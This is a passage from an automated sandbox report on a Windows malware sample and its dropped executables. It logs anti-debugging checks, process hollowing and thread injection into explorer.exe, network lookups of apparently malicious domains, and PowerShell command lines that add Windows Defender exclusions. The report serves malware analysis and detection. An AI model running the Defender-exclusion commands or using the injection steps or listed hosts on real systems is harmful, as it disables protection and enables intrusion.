Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 mov eax, dword ptr fs:[00000030h] 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 mov eax, dword ptr fs:[00000030h] 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 mov eax, dword ptr fs:[00000030h] 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 mov eax, dword ptr fs:[00000030h] 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 mov eax, dword ptr fs:[00000030h] 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01AAB0 mov eax, dword ptr fs:[00000030h] 22_2_6C01AAB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01AAB0 mov eax, dword ptr fs:[00000030h] 22_2_6C01AAB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0312BD mov esi, dword ptr fs:[00000030h] 22_2_6C0312BD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0312BD mov eax, dword ptr fs:[00000030h] 22_2_6C0312BD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0312BD mov eax, dword ptr fs:[00000030h] 22_2_6C0312BD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005AC0 mov eax, dword ptr fs:[00000030h] 22_2_6C005AC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005AC0 mov eax, dword ptr fs:[00000030h] 22_2_6C005AC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005AC0 mov eax, dword ptr fs:[00000030h] 22_2_6C005AC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032ACB mov eax, dword ptr fs:[00000030h] 22_2_6C032ACB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003ACA mov eax, dword ptr fs:[00000030h] 22_2_6C003ACA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8ADD mov eax, dword ptr fs:[00000030h] 22_2_6C0D8ADD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032AE4 mov eax, dword ptr fs:[00000030h] 22_2_6C032AE4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C131B mov eax, dword ptr fs:[00000030h] 22_2_6C0C131B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C094320 mov eax, dword ptr fs:[00000030h] 22_2_6C094320
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BE33D mov eax, dword ptr fs:[00000030h] 22_2_6C0BE33D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F340 mov eax, dword ptr fs:[00000030h] 22_2_6C00F340
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00DB40 mov eax, dword ptr fs:[00000030h] 22_2_6C00DB40
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8B58 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8B58
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F358 mov eax, dword ptr fs:[00000030h] 22_2_6C00F358
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B5A mov eax, dword ptr fs:[00000030h] 22_2_6C033B5A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096365 mov eax, dword ptr fs:[00000030h] 22_2_6C096365
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B7A mov eax, dword ptr fs:[00000030h] 22_2_6C033B7A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0AEB8A mov ecx, dword ptr fs:[00000030h] 22_2_6C0AEB8A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0AEB8A mov eax, dword ptr fs:[00000030h] 22_2_6C0AEB8A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C138A mov eax, dword ptr fs:[00000030h] 22_2_6C0C138A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BD380 mov ecx, dword ptr fs:[00000030h] 22_2_6C0BD380
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004B94 mov edi, dword ptr fs:[00000030h] 22_2_6C004B94
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F395 mov eax, dword ptr fs:[00000030h] 22_2_6C00F395
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1BA8 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1BA8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034BAD mov eax, dword ptr fs:[00000030h] 22_2_6C034BAD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D9BBE mov eax, dword ptr fs:[00000030h] 22_2_6C0D9BBE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8BB6 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8BB6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0853CA mov eax, dword ptr fs:[00000030h] 22_2_6C0853CA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B23E3 mov ecx, dword ptr fs:[00000030h] 22_2_6C0B23E3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B23E3 mov eax, dword ptr fs:[00000030h] 22_2_6C0B23E3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C001BE9 mov eax, dword ptr fs:[00000030h] 22_2_6C001BE9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02DBE9 mov eax, dword ptr fs:[00000030h] 22_2_6C02DBE9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C013BF4 mov eax, dword ptr fs:[00000030h] 22_2_6C013BF4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C013BF4 mov ecx, dword ptr fs:[00000030h] 22_2_6C013BF4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0023F6 mov eax, dword ptr fs:[00000030h] 22_2_6C0023F6
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_02DC0D90 mov eax, dword ptr fs:[00000030h] 27_2_02DC0D90
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_02DC092B mov eax, dword ptr fs:[00000030h] 27_2_02DC092B
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_02DED526 push dword ptr fs:[00000030h] 27_2_02DED526
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\esdfufc Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_0041D410 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D410
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C036B90 rdtsc 22_2_6C036B90
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049600 ZwOpenKey,LdrInitializeThunk, 22_2_6C049600
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_0041D410 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D410
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_004266A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004266A0
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 12_2_0041D410 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_0041D410
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 12_2_004266A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_004266A0

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 37D8.exe.6.dr
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\esdfufc Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\esdfufc Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Memory written: C:\Users\user\Desktop\y8WngeDn4q.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\esdfufc Memory written: C:\Users\user\AppData\Roaming\esdfufc base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\8908.exe Memory written: C:\Users\user\AppData\Local\Temp\8908.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_04760110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 0_2_04760110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Thread created: C:\Windows\explorer.exe EIP: 2801920
Source: C:\Users\user\AppData\Roaming\esdfufc Thread created: unknown EIP: 41A1920
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Thread created: unknown EIP: 48F19C0
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Thread created: unknown EIP: 4E81920
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\37D8.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\60DF.exe' -Force
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 41C000
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 41E000
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Process created: C:\Users\user\Desktop\y8WngeDn4q.exe 'C:\Users\user\Desktop\y8WngeDn4q.exe'
Source: C:\Users\user\AppData\Roaming\esdfufc Process created: C:\Users\user\AppData\Roaming\esdfufc C:\Users\user\AppData\Roaming\esdfufc
Source: C:\Users\user\AppData\Local\Temp\8908.exe Process created: C:\Users\user\AppData\Local\Temp\8908.exe C:\Users\user\AppData\Local\Temp\8908.exe
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\37D8.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\60DF.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /SpecialRun 4101d8 5988
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /SpecialRun 4101d8 780
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 25_2_00401C26
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 22_2_6C03E730
Source: explorer.exe, 00000006.00000000.394005574.0000000000EE0000.00000002.00020000.sdmp, csdfufc, 00000027.00000002.672507255.0000000003790000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.394005574.0000000000EE0000.00000002.00020000.sdmp, csdfufc, 00000027.00000002.672507255.0000000003790000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.394005574.0000000000EE0000.00000002.00020000.sdmp, csdfufc, 00000027.00000002.672507255.0000000003790000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000006.00000000.394005574.0000000000EE0000.00000002.00020000.sdmp, csdfufc, 00000027.00000002.672507255.0000000003790000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\37D8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\3FD8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Queries volume information: C:\Users\user\AppData\Local\Temp\60DF.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
